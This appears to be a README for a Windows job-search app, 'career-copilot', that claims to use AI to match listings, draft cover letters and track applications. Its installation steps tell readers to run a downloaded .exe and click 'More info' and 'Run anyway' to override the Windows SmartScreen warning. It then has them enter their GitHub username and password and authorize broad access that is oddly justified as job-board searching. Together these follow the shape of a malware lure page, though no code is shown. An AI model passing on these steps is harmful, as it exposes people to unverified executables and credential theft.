Job searching takes time. You spend hours scanning boards, writing cover letters, and tailoring resumes. Career-copilot automates these repetitive steps. This tool uses artificial intelligence to find listings that match your skills. It then generates drafts and tracks your progress. You spend less time clicking and more time interviewing.

📋 System Requirements

Your computer needs a few things to run this software.

  • Windows 10 or Windows 11.
  • A stable internet connection.
  • At least 500 MB of free storage space.
  • A valid GitHub account.

📥 Downloading The Software

You get the latest version of the application from the official page.

Download Version 1.0

Click the link above to visit the repository. Look for the Releases section on the right side of the screen. Click the link that ends in .exe to start your download.

⚙️ Installation Steps

  1. Find the file you downloaded in your Downloads folder.
  2. Double-click the file named career-copilot.exe to begin.
  3. Windows might show a blue box saying "Windows protected your PC."
  4. Click the "More info" link in that blue box.
  5. Click the "Run anyway" button that appears.
  6. Follow the prompts on the screen to finish the setup.
  7. A shortcut now appears on your desktop.

🚀 Setting Up Your Profile

Open the application from your desktop shortcut. You must connect your GitHub account during the first launch.

  1. Select "Sign in with GitHub" when the app opens.
  2. A web browser window will open.
  3. Enter your GitHub username and password.
  4. Click "Authorize" to give the tool permission to search job boards.
  5. Return to the app. You are now ready to start.

🔍 How To Search For Jobs

The main dashboard lists every feature. Select "Start Search" to begin.

  1. Type your desired job title into the search box.
  2. Enter your location or choose "Remote."
  3. List your key skills in the requirements box.
  4. Click the "Search" button.

The app pulls live listings from major job boards. It compares your uploaded resume against the job description. The software gives each job a score based on your match. A high score means you represent a strong candidate for that role.

✍️ Creating Applications

This tool assists with your paperwork. Select a job listing from your search results. Click "Generate Application."

The tool reads the job description. It creates a custom cover letter based on your history. You review the draft within the app. Click "Edit" if you want to change any text. Click "Save" when you feel happy with the content.

📈 Managing Your Pipeline

Keep track of your applications with the built-in tracker. The app updates your status automatically when you submit a resume.

  • To Apply: Use this for jobs you just found.
  • Applied: Move jobs here after you send your resume.
  • Interview: Use this for jobs where you have a meeting scheduled.
  • Offer: Use this for jobs that provide a salary package.

You can drag and drop listings between these columns. This visual view helps you see where you stand in the hiring process.

Does this software store my personal data? No. Your data stays on your local machine. The tool only sends information to job sites when you choose to apply.
